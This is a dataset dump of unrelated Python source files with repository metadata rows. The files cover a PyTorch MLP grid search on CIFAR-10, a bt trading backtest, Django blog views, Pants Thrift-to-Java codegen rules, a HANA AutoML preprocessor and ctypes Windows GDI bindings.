return ".{" + ", ".join(group) + "}"
| 29.132743 | 79 | 0.600547 | 441 | 3,292 | 4.403628 | 0.287982 | 0.018023 | 0.020597 | 0.026777 | 0.317714 | 0.289907 | 0.279094 | 0.249228 | 0.249228 | 0.167868 | 0 | 0.003438 | 0.293135 | 3,292 | 112 | 80 | 29.392857 | 0.831113 | 0.395504 | 0 | 0.235294 | 0 | 0 | 0.074339 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098039 | false | 0.019608 | 0.058824 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cf4544311c2e0722d765a266da005b76bf3bdb4 | 11,367 | py | Python | Assignment/Pytorch_improvements/ex2_pytorch_grid_search.py | EgonFerri/Ex2_NN_backpropr | 3b9426bcda279188cf55908090da51845c9c2ca6 | [
"MIT"
] | null | null | null | Assignment/Pytorch_improvements/ex2_pytorch_grid_search.py | EgonFerri/Ex2_NN_backpropr | 3b9426bcda279188cf55908090da51845c9c2ca6 | [
"MIT"
] | null | null | null | Assignment/Pytorch_improvements/ex2_pytorch_grid_search.py | EgonFerri/Ex2_NN_backpropr | 3b9426bcda279188cf55908090da51845c9c2ca6 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torchvision.transforms as transforms
import numpy as np
import pandas as pd
from sklearn.model_selection import ParameterGrid
from tqdm import tqdm_notebook as tqdm
def kaiming_init(m):
'''Initilize weights (with kaiming initialization)
and bias (with 0s)'''
if type(m) == nn.Linear:
torch.nn.init.kaiming_normal_(m.weight, nonlinearity='relu')
m.bias.data.fill_(0.)
def xavier_init(m):
'''Initilize weights (with kaiming initialization)
and bias (with 0s)'''
if type(m) == nn.Linear:
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.)
def update_lr(optimizer, lr):
'''Update learning rate'''
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def n_neurons(num_layers):
'''Given the number of layer it returns a list with legth equal to the
number of layer. Each element of the list is an integer that represents the
number of neuron for the layer corresponding to its index'''
if num_layers < 2:# error
return 'Error: number of layer has to be >= 2'
else:
neurons = [50]*2
for i in range(2, num_layers):
neurons += [50*i]
if max(neurons) > input_size: # error
return 'Error: number of neuron is higher than input size'
else:
return sorted(neurons, reverse=True)
#--------------------------------
# Device configuration
#--------------------------------
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Using device: %s'%device)
#--------------------------------
# Hyper-parameters (fixed)
#--------------------------------
input_size = 32 * 32 * 3
num_classes = 10
num_epochs = 20 # more epochs but stopping rule has been introduced
batch_size = 200
learning_rate = 1e-3
learning_rate_decay = 0.95
reg=0.001
num_training= 49000
num_validation =1000
#-------------------------------------------------
# Load the CIFAR-10 dataset
#-------------------------------------------------
norm_transform = transforms.Compose([transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
])
cifar_dataset = torchvision.datasets.CIFAR10(root='datasets/',
train=True,
transform=norm_transform,
download=True)
test_dataset = torchvision.datasets.CIFAR10(root='datasets/',
train=False,
transform=norm_transform
)
#-------------------------------------------------
# Prepare the training and validation splits
#-------------------------------------------------
mask = list(range(num_training))
train_dataset = torch.utils.data.Subset(cifar_dataset, mask)
mask = list(range(num_training, num_training + num_validation))
val_dataset = torch.utils.data.Subset(cifar_dataset, mask)
#-------------------------------------------------
# Data loader
#-------------------------------------------------
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=batch_size,
shuffle=True)
val_loader = torch.utils.data.DataLoader(dataset=val_dataset,
batch_size=batch_size,
shuffle=False)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
batch_size=batch_size,
shuffle=False)
#======================================================================================
# Fully connected neural network for Grid Search
#======================================================================================
class MultiLayerPerceptronGridSearch(nn.Module):
def __init__(self, input_size, hidden_layers, num_classes, activation_func, batchn=False, dropout=False):
super(MultiLayerPerceptronGridSearch, self).__init__()
layers = [] # layers list to store a variable number of layers
layers.append(nn.Linear(input_size, hidden_layers[0])) # Input layer
if batchn:
layers.append(nn.BatchNorm1d(num_features=hidden_layers[0])) # Batch Normalization
layers.append(activation_func) # Activation function
if dropout:
layers.append(nn.Dropout(p=0.3)) # Dropout
# iterate through hidden layer list to add as many layer as wanted
# hidden layer is a list in which every item represent the numeber of neurons for that layer
for i in range(1, len(hidden_layers)-1):
layers.append(nn.Linear(hidden_layers[i-1], hidden_layers[i]))
if batchn:
layers.append(nn.BatchNorm1d(num_features=hidden_layers[i])) # Batch Normalization
layers.append(activation_func) # Activation function
if dropout:
layers.append(nn.Dropout(p=0.3)) # Dropout
layers.append(nn.Linear(hidden_layers[-1], num_classes)) # Output layer
# Enter the layers into nn.Sequential, so the model may "see" them
self.layers = nn.Sequential(*layers)
def forward(self, x):
out = self.layers(x)
return out
#-------------------------------------------------
# Implementation of Grid Search
#-------------------------------------------------
# Seed for reproducibility
torch.manual_seed(2020)
# Possible values of other hyperparameters
hyper_grid = {'num_layers': [2, 3, 4, 5, 10],
'init_&_activation_func' : [(xavier_init, nn.Tanh()), (kaiming_init, nn.ReLU()), (kaiming_init, nn.LeakyReLU())],
'opt': [torch.optim.SGD, torch.optim.Adam],
'batch_norm_layer': [True, False],
'drop_layer': [True, False]}
# Form all possible combiantions
grid = ParameterGrid(hyper_grid)
all_res = []
counter = -1
for hypers in tqdm(grid):
counter += 1
# Hyperparameters combination
num_layers = hypers['num_layers']
# len(hidden_size) == num_layers and each item is the n. of neurons for that layer
hidden_size = n_neurons(num_layers)
init, activation_func = hypers['init_&_activation_func'] # initialiation and activation fuction to be used
opt = hypers['opt'] # optimizer
batch_norm_layer = hypers['batch_norm_layer'] # boolian to insert Batch Nomalization
drop_layer = hypers['drop_layer'] # boolian to insert Dropout
print('\n\n\n\nHyperparameters: num_layers = '+str(num_layers)+', activation_func = '+str(activation_func)+
', batch_norm_layer = '+str(batch_norm_layer)+', drop_layer = '+str(drop_layer))
# Model
model = MultiLayerPerceptronGridSearch(input_size, hidden_size, num_classes, activation_func=activation_func,
batchn=batch_norm_layer, dropout=drop_layer).to(device)
# Weight initialization
model.apply(init)
# Loss and optimizer
criterion = nn.CrossEntropyLoss()
optimizer = opt(model.parameters(), lr=learning_rate, weight_decay=reg)
# Train the model
lr = learning_rate
total_step = len(train_loader)
# To early stop
best_score = None
patience = 5
# To track training accuracy/loss
train_acc = []
train_loss = []
# To track the validation accuracy/loss
val_acc = []
val_loss = []
# To track learning rate
lr_list = []
for epoch in range(num_epochs):
model.train() #set dropout and batch normalization layers to training mode
correct_tr = 0
total_tr = 0
for i, (images, labels) in enumerate(train_loader):
# Move tensors to the configured device
images = images.to(device)
labels = labels.to(device)
# Pass images to the model to compute predicted labels
images = images.view(images.size(0), -1)
pred_labels = model(images)
# Compute the loss using the predicted labels and the actual labels.
loss = criterion(pred_labels, labels)
# Compute gradients and update the model using the optimizer
optimizer.zero_grad()
loss.backward()
optimizer.step()
tr_loss = loss.item()
if (i+1) % 100 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, tr_loss))
# Train accuracy
predicted = torch.argmax(pred_labels, dim=1)
total_tr += labels.size(0)
correct_tr += (predicted == labels).sum().item()
acc_tr = correct_tr / total_tr
train_acc.append(acc_tr)
train_loss.append(round(tr_loss, 4))
# Code to update the lr
lr *= learning_rate_decay
lr_list.append(lr)
update_lr(optimizer, lr)
with torch.no_grad():
correct = 0
total = 0
model.eval() #set dropout and batch normalization layers to evaluation model
for images, labels in val_loader:
images = images.to(device)
labels = labels.to(device)
images = images = images.view(images.size(0), -1)
pred_labels = model(images)
v_loss = criterion(pred_labels, labels) # validation loss
predicted = torch.argmax(pred_labels, dim=1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
acc = correct / total
print('Validataion accuracy is: {} %'.format(100 * acc))
# Stopping rule
if best_score is None: # occurs at fist epoch
best_score = acc # set a value for best score
count = 0 # count needed to check patience
torch.save(model.state_dict(), str(counter)+'_model.ckpt') # save weights
print('Model saved')
elif best_score > acc + 1e-03: # best accuracy is better than the current accuracy
count += 1 # update count
if count >= patience: # if count reach patience -> early stop
print('Patience: '+str(count)+'/'+str(patience)+' -> Early stopping')
break
else:
print('Patience: '+str(count)+'/'+str(patience))
else:
best_score = acc # update best score
count = 0 # set/reset count to 0
torch.save(model.state_dict(), str(counter)+'_model.ckpt') # save weights
print('Model saved')
# Save accuracy value for the current epoch
val_acc.append(acc)
val_loss.append(round(v_loss.item(), 4))
# Save loss and accuracy
np.save(str(counter)+'_learning_rate.npy', lr_list)
np.save(str(counter)+'_train_acc.npy', train_acc)
np.save(str(counter)+'_train_loss.npy', train_loss)
np.save(str(counter)+'_val_acc.npy', val_acc)
np.save(str(counter)+'_val_loss.npy', val_loss)
# Save result in a dataframe
all_res.append({'N. layers': num_layers, 'Batch Normalization': batch_norm_layer, 'Activation': str(activation_func),
'Dropout': drop_layer, 'Optimizer': str(opt), 'Train acc': acc_tr, 'Val acc': (100 * best_score)})
out_rs = pd.DataFrame(all_res)
out_rs.to_csv('MLP_grid_search.csv', index=False)
print('Grid search ended and results saved')
| 38.402027 | 127 | 0.590833 | 1,360 | 11,367 | 4.783824 | 0.227206 | 0.015217 | 0.015063 | 0.003074 | 0.286658 | 0.235629 | 0.188749 | 0.150015 | 0.112512 | 0.112512 | 0 | 0.014098 | 0.251166 | 11,367 | 295 | 128 | 38.532203 | 0.750235 | 0.259083 | 0 | 0.193717 | 0 | 0 | 0.084035 | 0.008175 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031414 | false | 0 | 0.04712 | 0 | 0.104712 | 0.04712 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cf472f4ca4830340edb61545a9592eaf91f9937 | 506 | py | Python | quanttrade/test/SmaTest.py | dingmingliu/quanttrade | 2d9eaf9f2339a51458ef1e130c60b0132d9e57bb | [
"Apache-2.0"
] | null | null | null | quanttrade/test/SmaTest.py | dingmingliu/quanttrade | 2d9eaf9f2339a51458ef1e130c60b0132d9e57bb | [
"Apache-2.0"
] | null | null | null | quanttrade/test/SmaTest.py | dingmingliu/quanttrade | 2d9eaf9f2339a51458ef1e130c60b0132d9e57bb | [
"Apache-2.0"
] | 1 | 2021-10-02T12:22:30.000Z | 2021-10-02T12:22:30.000Z | __author__ = 'tyler'
import bt
#%pylab inline
# download data
data = bt.get('aapl,msft', start='2013-01-01')
data.head()
import pandas as pd
# a rolling mean is a moving average, right?
sma = pd.rolling_mean(data, 50)
s = bt.Strategy('above50sma', [ bt.algos.SelectWhere(data > sma),
bt.algos.WeighEqually(),
bt.algos.Rebalance()])
# now we create the Backtest
t = bt.Backtest(s, data)
# and let's run it!
res = bt.run(t)
| 25.3 | 66 | 0.58498 | 71 | 506 | 4.098592 | 0.633803 | 0.072165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033058 | 0.282609 | 506 | 19 | 67 | 26.631579 | 0.768595 | 0.227273 | 0 | 0 | 0 | 0 | 0.092896 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cf5db2bf88364cfebbc87d0de7355ee48538556 | 778 | py | Python | mainsite/views.py | Anthlay/mblog | 2f19f7eba6c1b77f829c88373f9ecf94de57024a | [
"Apache-2.0"
] | null | null | null | mainsite/views.py | Anthlay/mblog | 2f19f7eba6c1b77f829c88373f9ecf94de57024a | [
"Apache-2.0"
] | 4 | 2020-02-12T01:14:04.000Z | 2021-06-10T21:48:09.000Z | mainsite/views.py | Anthlay/mblog | 2f19f7eba6c1b77f829c88373f9ecf94de57024a | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from django.shortcuts import render, redirect
from django.http import HttpResponse
from .models import Post
# Create your views here
def homepage(request):
posts = Post.objects.all()
post_lists = list()
for count,post in enumerate(posts):
posts = Post.objects.all()
now = datetime.now()
return render(request,'index.html',locals())
#post_lists.append("No.{}:".format(str(count))+str(post)+"<br>")
#post_lists.append("<small>"+str(post.body)+"</small><br><br>")
#return HttpResponse(post_lists)
def showpost(request,slug):
try:
post = Post.objects.get(slug=slug)
if post != None:
return render(request,'post.html',locals())
except:
return redirect('/') | 33.826087 | 72 | 0.650386 | 99 | 778 | 5.070707 | 0.464646 | 0.071713 | 0.063745 | 0.075697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.201799 | 778 | 23 | 73 | 33.826087 | 0.808374 | 0.228792 | 0 | 0.111111 | 0 | 0 | 0.033557 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cfd44b4f9b3f25b6ece98512e0b6a0746c58433 | 2,680 | py | Python | src/python/pants/backend/codegen/thrift/apache/java/rules.py | wimax-grapl/pants | 0aabd417a772ea4e39999c4415c67db40de679a4 | [
"Apache-2.0"
] | null | null | null | src/python/pants/backend/codegen/thrift/apache/java/rules.py | wimax-grapl/pants | 0aabd417a772ea4e39999c4415c67db40de679a4 | [
"Apache-2.0"
] | 28 | 2021-12-27T15:53:46.000Z | 2022-03-23T11:01:42.000Z | src/python/pants/backend/codegen/thrift/apache/java/rules.py | wimax-grapl/pants | 0aabd417a772ea4e39999c4415c67db40de679a4 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.backend.codegen.thrift.apache.java import subsystem
from pants.backend.codegen.thrift.apache.java.subsystem import ApacheThriftJavaSubsystem
from pants.backend.codegen.thrift.apache.rules import (
GeneratedThriftSources,
GenerateThriftSourcesRequest,
)
from pants.backend.codegen.thrift.target_types import ThriftDependenciesField, ThriftSourceField
from pants.backend.java.target_types import JavaSourceField
from pants.engine.addresses import Addresses, UnparsedAddressInputs
from pants.engine.fs import AddPrefix, Digest, Snapshot
from pants.engine.internals.selectors import Get
from pants.engine.rules import collect_rules, rule
from pants.engine.target import (
GeneratedSources,
GenerateSourcesRequest,
InjectDependenciesRequest,
InjectedDependencies,
)
from pants.engine.unions import UnionRule
from pants.source.source_root import SourceRoot, SourceRootRequest
from pants.util.logging import LogLevel
class GenerateJavaFromThriftRequest(GenerateSourcesRequest):
input = ThriftSourceField
output = JavaSourceField
@rule(desc="Generate Java from Thrift", level=LogLevel.DEBUG)
async def generate_java_from_thrift(
request: GenerateJavaFromThriftRequest,
thrift_java: ApacheThriftJavaSubsystem,
) -> GeneratedSources:
result = await Get(
GeneratedThriftSources,
GenerateThriftSourcesRequest(
thrift_source_field=request.protocol_target[ThriftSourceField],
lang_id="java",
lang_options=thrift_java.gen_options,
lang_name="Java",
),
)
source_root = await Get(
SourceRoot, SourceRootRequest, SourceRootRequest.for_target(request.protocol_target)
)
source_root_restored = (
await Get(Snapshot, AddPrefix(result.snapshot.digest, source_root.path))
if source_root.path != "."
else await Get(Snapshot, Digest, result.snapshot.digest)
)
return GeneratedSources(source_root_restored)
class InjectApacheThriftJavaDependencies(InjectDependenciesRequest):
inject_for = ThriftDependenciesField
@rule
async def inject_apache_thrift_java_dependencies(
_: InjectApacheThriftJavaDependencies, thrift_java: ApacheThriftJavaSubsystem
) -> InjectedDependencies:
addresses = await Get(Addresses, UnparsedAddressInputs, thrift_java.runtime_dependencies)
return InjectedDependencies(addresses)
def rules():
return (
*collect_rules(),
*subsystem.rules(),
UnionRule(GenerateSourcesRequest, GenerateJavaFromThriftRequest),
)
| 34.805195 | 96 | 0.776493 | 259 | 2,680 | 7.899614 | 0.332046 | 0.057185 | 0.043988 | 0.044966 | 0.069404 | 0.05523 | 0.038123 | 0 | 0 | 0 | 0 | 0.002646 | 0.153731 | 2,680 | 76 | 97 | 35.263158 | 0.899471 | 0.047015 | 0 | 0.032787 | 0 | 0 | 0.013328 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016393 | false | 0 | 0.213115 | 0.016393 | 0.360656 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cfeca7d709f2e090e6854d324dfeda0011d1640 | 11,124 | py | Python | hana_automl/preprocess/preprocessor.py | dan0nchik/SAP-HANA-AutoML | 68cde80bd7fbfc751fb56062af30aec9238f9fb3 | [
"MIT"
] | 59 | 2021-01-10T18:35:38.000Z | 2022-02-28T16:49:06.000Z | hana_automl/preprocess/preprocessor.py | u1810291/SAP-HANA-AutoML | 06200bd1f813916fc81eb1ccb0ed0b1275e22945 | [
"MIT"
] | 3 | 2021-02-01T19:33:39.000Z | 2021-06-29T08:32:33.000Z | hana_automl/preprocess/preprocessor.py | u1810291/SAP-HANA-AutoML | 06200bd1f813916fc81eb1ccb0ed0b1275e22945 | [
"MIT"
] | 10 | 2021-06-18T12:35:34.000Z | 2021-12-28T18:48:36.000Z | import copy
import math
from hana_ml import DataFrame
from hana_ml.algorithms.pal.neighbors import KNNRegressor
from hana_ml.algorithms.pal.preprocessing import (
Imputer,
FeatureNormalizer,
variance_test,
)
from hana_automl.algorithms.classification.decisiontreecls import DecisionTreeCls
from hana_automl.algorithms.classification.gradboostcls import GBCls
from hana_automl.algorithms.classification.hybgradboostcls import HGBCls
from hana_automl.algorithms.classification.kneighborscls import KNeighborsCls
from hana_automl.algorithms.classification.logregressioncls import LogRegressionCls
from hana_automl.algorithms.classification.mlpcl import MLPcls
from hana_automl.algorithms.classification.naive_bayes import NBayesCls
from hana_automl.algorithms.classification.rdtclas import RDTCls
from hana_automl.algorithms.classification.svc import SVCls
from hana_automl.algorithms.regression.decisiontreereg import DecisionTreeReg
from hana_automl.algorithms.regression.expreg import ExponentialReg
from hana_automl.algorithms.regression.glmreg import GLMReg
from hana_automl.algorithms.regression.gradboostreg import GBReg
from hana_automl.algorithms.regression.hybgradboostreg import HGBReg
from hana_automl.algorithms.regression.kneighborsreg import KNeighborsReg
from hana_automl.algorithms.regression.mlpreg import MLPreg
from hana_automl.algorithms.regression.rdtreg import RDTReg
from hana_automl.algorithms.regression.svr import SVReg
from hana_automl.utils.error import PreprocessError
class Preprocessor:
def __init__(self):
self.clsdict = {
"KNeighborsClassifier": KNeighborsCls(),
"DecisionTreeClassifier": DecisionTreeCls(),
# "LogisticRegressionClassifier": log,
"NaiveBayesClassifier": NBayesCls(),
"MLPClassifier": MLPcls(),
"SupportVectorClassifier": SVCls(),
"RandomDecisionTreeClassifier": RDTCls(),
"GradientBoostingClassifier": GBCls(),
"HybridGradientBoostingClassifier": HGBCls(),
}
self.regdict = {
"DecisionTreeRegressor": DecisionTreeReg(),
# "GLMRegressor": GLMReg(),
"ExponentialRegressor": ExponentialReg(),
"MLPRegressor": MLPreg(),
"Random_Decision_Tree_Regressor": RDTReg(),
"SupportVectorRegressor": SVReg(),
"GradientBoostingRegressor": GBReg(),
"HybridGradientBoostingRegressor": HGBReg(),
"KNNRegressor": KNeighborsReg(),
}
def autoimput(
self,
df: DataFrame = None,
target: str = None,
id: str = None,
imputer_num_strategy: str = None,
strategy_by_col: str = None,
normalizer_strategy: str = None,
normalizer_z_score_method: str = None,
normalize_int: bool = None,
categorical_list: list = None,
normalization_excp: list = None,
):
if df is None:
raise PreprocessError("Enter not null data!")
impute = Imputer(strategy=imputer_num_strategy)
if categorical_list is not None:
categorical_list = list(set(categorical_list))
if target is None:
cols = df.columns
for column in categorical_list:
if column not in cols:
categorical_list.remove(column)
if strategy_by_col is not None:
result = impute.fit_transform(
df,
categorical_variable=categorical_list,
strategy_by_col=strategy_by_col,
)
else:
result = impute.fit_transform(
df,
categorical_variable=categorical_list,
)
else:
if strategy_by_col is not None:
result = impute.fit_transform(df, strategy_by_col=strategy_by_col)
else:
result = impute.fit_transform(df)
result = self.normalize(
result,
normalizer_strategy,
id,
target,
categorical_list=categorical_list,
norm_int=normalize_int,
z_score_method=normalizer_z_score_method,
normalization_excp=normalization_excp,
)
return result
def removecolumns(self, columns: list, df: DataFrame):
if df is None:
raise PreprocessError("Enter not null data!")
if columns is not None:
df = df.drop(columns)
return df
def normalize(
self,
df: DataFrame,
method: str,
id: str,
target: str,
categorical_list: list = None,
norm_int: bool = False,
z_score_method: str = "mean-standard",
normalization_excp=None,
):
if df is None:
raise PreprocessError("Enter not null data!")
if method == "min-max":
fn = FeatureNormalizer(method="min-max", new_max=1.0, new_min=0.0)
elif method == "z-score":
fn = FeatureNormalizer(method="z-score", z_score_method=z_score_method)
else:
fn = FeatureNormalizer(method="decimal")
col_list = df.columns
remove_list = list()
if categorical_list is not None and len(categorical_list) > 0:
for i in categorical_list:
remove_list.append(i)
else:
categorical_list = []
dt = df.dtypes()
if norm_int:
int_lst = []
for i in dt:
if target is None:
targ_variant = True
else:
targ_variant = i[0] != target
if (
i[0] != id
and (i[1] in ["INT", "SMALLINT", "MEDIUMINT", "INTEGER", "BIGINT"])
and targ_variant
and not (i[0] in categorical_list)
):
int_lst.append(i[0])
if len(int_lst) > 0:
df = df.cast(int_lst, "DOUBLE")
dt = df.dtypes()
for i in dt:
if target is None:
targ_variant = False
else:
targ_variant = i[0] == target
if i[0] == id or targ_variant or i[1] in ["INT", "CHAR", "VARCHAR"]:
if not i[0] in remove_list:
remove_list.append(i[0])
if normalization_excp is not None:
for i in normalization_excp:
if i not in remove_list:
remove_list.append(i)
if len(remove_list) > 0:
for i in remove_list:
col_list.remove(i)
if len(col_list) > 0:
trn: DataFrame = fn.fit_transform(df, key=id, features=col_list)
trn = trn.rename_columns({id: "TEMP_ID"})
df = df.drop(col_list)
df = (
df.alias("SOURCE")
.join(
trn.alias("NORMALIZED"),
f"NORMALIZED.TEMP_ID = SOURCE.{id}",
how="inner",
)
.drop(["TEMP_ID"])
)
return df
def autoremovecolumns(self, df: DataFrame):
for column in df.columns:
if (
"object" == str(df[column].dtype)
and df[column].nunique() > df[column].shape[0] / 100 * 7
) or (df[column].nunique() > df[column].shape[0] / 100 * 9):
df = df.drop([column])
return df
def drop_outers(self, df: DataFrame, id: str, target: str, cat_list: list):
col_list = df.columns
if cat_list is None:
cat_list = []
cat_list.append(target)
cat_list.append(id)
col_list = list(filter(lambda column: column not in cat_list, col_list))
data_types = df.dtypes()
for i in data_types:
if i[0] in col_list:
if i[1] == "CHAR" or i[1] == "VARCHAR":
col_list.remove(i[0])
for i in col_list:
df = (
variance_test(data=df, sigma_num=3.0, key=id, data_col=i)[0]
.rename_columns(["ID_TEMP", "DROP"])
.join(df, "ID_TEMP=" + id)
.deselect("ID_TEMP")
.filter("DROP = 0")
.deselect("DROP")
)
return df
def set_task(self, data, target: str, task: str, algo_exceptions=None):
if algo_exceptions is None:
algo_exceptions = []
if task is None:
if data.train.distinct(target).count() < 10:
task = "cls"
else:
task = "reg"
if task == "cls":
if data.binomial:
vals = data.train.select(data.target).collect()[data.target].unique()
log = LogRegressionCls(
binominal=data.binomial, class_map0=vals[0], class_map1=vals[1]
)
else:
log = LogRegressionCls(binominal=data.binomial)
self.clslist = [
DecisionTreeCls(),
KNeighborsCls(),
# log,
NBayesCls(),
MLPcls(),
SVCls(),
RDTCls(),
GBCls(),
HGBCls(),
]
clslist = [i for i in self.clslist if i.title not in algo_exceptions]
clsdict = {
key: value
for key, value in self.clsdict.items()
if key.title not in algo_exceptions
}
return clslist, "cls", clsdict
else:
self.reglist = [
DecisionTreeReg(),
# GLMReg(),
KNeighborsReg(),
MLPreg(),
SVReg(),
RDTReg(),
GBReg(),
HGBReg(),
]
reglist = [i for i in self.reglist if i.title not in algo_exceptions]
regdict = {
key: value
for key, value in self.regdict.items()
if key.title not in algo_exceptions
}
return reglist, "reg", regdict
@staticmethod
def check_binomial(df: DataFrame, target: str):
if target is None or df is None:
raise PreprocessError("Enter correct data for check!")
if df.distinct(target).count() < 3:
return True
else:
return False
@staticmethod
def check_normalization_exceptions(df, id, target, categorical_list):
excpt_list = []
dts = df.columns
dts.remove(id)
dts.remove(target)
if categorical_list is None:
categorical_list = []
for dt in dts:
if (
df.is_numeric(dt)
and dt not in categorical_list
and df.distinct(dt).count() < 3
):
excpt_list.append(dt)
if len(excpt_list) < 1:
return None
else:
return excpt_list
| 36.834437 | 87 | 0.548993 | 1,149 | 11,124 | 5.165361 | 0.182768 | 0.029655 | 0.044819 | 0.072789 | 0.304297 | 0.159225 | 0.144903 | 0.117607 | 0.106824 | 0.081887 | 0 | 0.006356 | 0.363538 | 11,124 | 301 | 88 | 36.956811 | 0.831921 | 0.006922 | 0 | 0.216783 | 0 | 0 | 0.061945 | 0.023546 | 0 | 0 | 0 | 0 | 0 | 1 | 0.031469 | false | 0 | 0.083916 | 0 | 0.157343 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cffe20ef35dd83ae3e95a578a5a23bf44a0fc19 | 2,534 | py | Python | cwinsdk/um/wingdi.py | Vlastbia/ctypes-windows-sdk | ccb2c7e83086840a620358507cac5c3fccc7e8af | [
"ISC"
] | null | null | null | cwinsdk/um/wingdi.py | Vlastbia/ctypes-windows-sdk | ccb2c7e83086840a620358507cac5c3fccc7e8af | [
"ISC"
] | null | null | null | cwinsdk/um/wingdi.py | Vlastbia/ctypes-windows-sdk | ccb2c7e83086840a620358507cac5c3fccc7e8af | [
"ISC"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
from ctypes import POINTER, c_int, Structure
from ctypes.wintypes import LPCSTR, HANDLE, LPCWSTR, DWORD, BOOL, UINT, LPVOID, WORD, LONG, BYTE
from .. import windll
HDC = HANDLE
HGDIOBJ = HANDLE
HBITMAP = HANDLE
DIB_RGB_COLORS = 0
HORZRES = 8
VERTRES = 10
SRCCOPY = 0x00CC0020
CAPTUREBLT = 0x40000000
from warnings import warn
warn("Don't use last parameter of `CreateDCA` or `CreateDCW`, as `DEVMODEA` and `DEVMODEW` are not defined correctly.")
DEVMODEA = c_int
DEVMODEW = c_int
class RGBQUAD(Structure):
_fields_ = [
("rgbBlue", BYTE),
("rgbGreen", BYTE),
("rgbRed", BYTE),
("rgbReserved", BYTE),
]
class BITMAPCOREHEADER(Structure):
_fields_ = [
("bcSize", DWORD),
("bcWidth", WORD),
("bcHeight", WORD),
("bcPlanes", WORD),
("bcBitCount", WORD),
]
class BITMAPINFOHEADER(Structure):
_fields_ = [
("biSize", DWORD),
("biWidth", LONG),
("biHeight", LONG),
("biPlanes", WORD),
("biBitCount", WORD),
("biCompression", DWORD),
("biSizeImage", DWORD),
("biXPelsPerMeter", LONG),
("biYPelsPerMeter", LONG),
("biClrUsed", DWORD),
("biClrImportant", DWORD),
]
class BITMAPINFO(Structure):
_fields_ = [
("bmiHeader", BITMAPINFOHEADER),
("bmiColors", RGBQUAD*1),
]
# functions
BitBlt = windll.Gdi32.BitBlt
BitBlt.argtypes = [HDC, c_int, c_int, c_int, c_int, HDC, c_int, c_int, DWORD]
BitBlt.restype = BOOL
CreateCompatibleBitmap = windll.Gdi32.CreateCompatibleBitmap
CreateCompatibleBitmap.argtypes = [HDC, c_int, c_int]
CreateCompatibleBitmap.restype = HBITMAP
CreateCompatibleDC = windll.Gdi32.CreateCompatibleDC
CreateCompatibleDC.argtypes = [HDC]
CreateCompatibleDC.restype = HDC
CreateDCA = windll.Gdi32.CreateDCA
CreateDCA.argtypes = [LPCSTR, LPCSTR, LPCSTR, POINTER(DEVMODEA)]
CreateDCA.restype = HDC
CreateDCW = windll.Gdi32.CreateDCW
CreateDCW.argtypes = [LPCWSTR, LPCWSTR, LPCWSTR, POINTER(DEVMODEW)]
CreateDCW.restype = HDC
DeleteDC = windll.Gdi32.DeleteDC
DeleteDC.argtypes = [HDC]
DeleteDC.restype = BOOL
DeleteObject = windll.Gdi32.DeleteObject
DeleteObject.argtypes = [HGDIOBJ]
DeleteObject.restype = BOOL
GetDeviceCaps = windll.Gdi32.GetDeviceCaps
GetDeviceCaps.argtypes = [HDC, c_int]
GetDeviceCaps.restype = c_int
GetDIBits = windll.Gdi32.GetDIBits
